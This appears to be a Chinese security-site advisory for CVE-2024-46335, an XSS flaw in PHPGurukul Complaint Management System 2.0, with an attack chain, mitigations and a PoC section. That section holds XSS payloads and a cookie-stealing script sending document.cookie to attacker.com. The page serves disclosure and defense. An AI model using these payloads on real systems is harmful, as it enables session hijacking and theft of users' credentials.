IPBUF安全漏洞报告
English
CVE-2024-46335 CVSS 4.6 中危

CVE-2024-46335 PHPGurukul投诉管理系统fromdate和todate参数XSS漏洞

披露日期: 2025-11-17
来源: [email protected]

漏洞信息

漏洞编号
CVE-2024-46335
漏洞类型
跨站脚本攻击(XSS)
CVSS评分
4.6 中危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
需要交互 (UI:R)
影响产品
PHPGurukul Complaint Management System 2.0

相关标签

CVE-2024-46335XSS跨站脚本攻击PHPGurukulComplaint Management Systembetween-date-userreport.phpfromdatetodateWeb应用安全中等严重程度

漏洞概述

CVE-2024-46335是PHPGurukul投诉管理系统(PHPGurukul Complaint Management System)2.0版本中的一个存储型跨站脚本(XSS)漏洞。该漏洞存在于between-date-userreport.php文件中的fromdate和todate参数中。攻击者可以通过在日期参数中注入恶意JavaScript代码,当其他用户访问相关报告页面时,恶意脚本将在受害者浏览器中执行。这可能导致会话劫持、敏感信息窃取、钓鱼攻击或对用户进行进一步的网络攻击。由于该漏洞需要低权限用户进行操作且需要用户交互,CVSS评分4.6属于中等严重程度。攻击者可利用此漏洞获取受害者Cookie、会话令牌或其他敏感数据,对系统和用户安全造成威胁。

技术细节

该漏洞属于反射型XSS(Reflected XSS)或存储型XSS,攻击者通过在fromdate和todate参数中注入恶意JavaScript代码。由于系统未对用户输入进行充分的输入验证和输出编码,恶意脚本被直接嵌入到页面中并执行。攻击者构造包含XSS payload的链接,如在日期字段中插入<script>alert(document.cookie)</script>等恶意代码,诱导具有查看报告权限的用户点击该链接。当用户访问包含恶意代码的页面时,浏览器会执行注入的脚本,从而实现会话劫持、Cookie窃取等恶意操作。该漏洞存在于投诉管理系统的报表生成功能中,攻击者可能利用此漏洞获取管理员或其他用户的敏感信息。

攻击链分析

STEP 1
步骤1
侦察阶段:攻击者识别目标系统使用PHPGurukul Complaint Management System 2.0版本
STEP 2
步骤2
定位漏洞点:访问between-date-userreport.php文件,发现fromdate和todate参数存在XSS漏洞
STEP 3
步骤3
构造恶意请求:攻击者构造包含XSS payload的请求,在fromdate或todate参数中注入恶意JavaScript代码
STEP 4
步骤4
诱导受害者:攻击者通过钓鱼邮件、社交工程等方式诱导具有报告查看权限的用户点击恶意链接
STEP 5
步骤5
执行恶意脚本:当受害者访问包含恶意代码的页面时,浏览器执行注入的脚本,窃取Cookie或会话信息
STEP 6
步骤6
会话劫持:攻击者利用窃取的凭证劫持受害者会话,进一步获取敏感数据或执行未授权操作

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
<!-- CVE-2024-46335 XSS PoC --> <!-- Target: PHPGurukul Complaint Management System 2.0 --> <!-- Vulnerable Parameter: fromdate, todate --> <!-- File: between-date-userreport.php --> <!-- PoC 1: Basic XSS Alert --> <form action="http://target.com/complaint/between-date-userreport.php" method="POST"> <input type="hidden" name="fromdate" value="<script>alert('XSS')</script>"> <input type="hidden" name="todate" value="<script>alert('XSS')</script>"> <input type="hidden" name="submit" value="1"> <input type="submit" value="Exploit"> </form> <!-- PoC 2: Cookie Stealing --> <!-- Inject via fromdate or todate parameter --> <script> document.write('<img src="http://attacker.com/steal?cookie=' + document.cookie + '"/>'); </script> <!-- PoC 3: URL-based XSS --> <!-- http://target.com/complaint/between-date-userreport.php?fromdate=<script>alert(document.domain)</script>&todate=<script>alert(document.cookie)</script> --> <!-- Recommended Payloads --> <!-- <script>alert(document.cookie)</script> --> <!-- <img src=x onerror=alert(document.cookie)> --> <!-- <svg onload=alert(document.domain)> -->

影响范围

PHPGurukul Complaint Management System 2.0

防御指南

临时缓解措施
在修复补丁发布之前,建议临时采取以下措施:1)限制用户对between-date-userreport.php页面的访问权限;2)部署Web应用防火墙规则过滤XSS特征字符;3)对相关参数实施严格的输入白名单验证;4)启用浏览器的XSS过滤器功能;5)监控和审计访问日志,及时发现异常请求。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表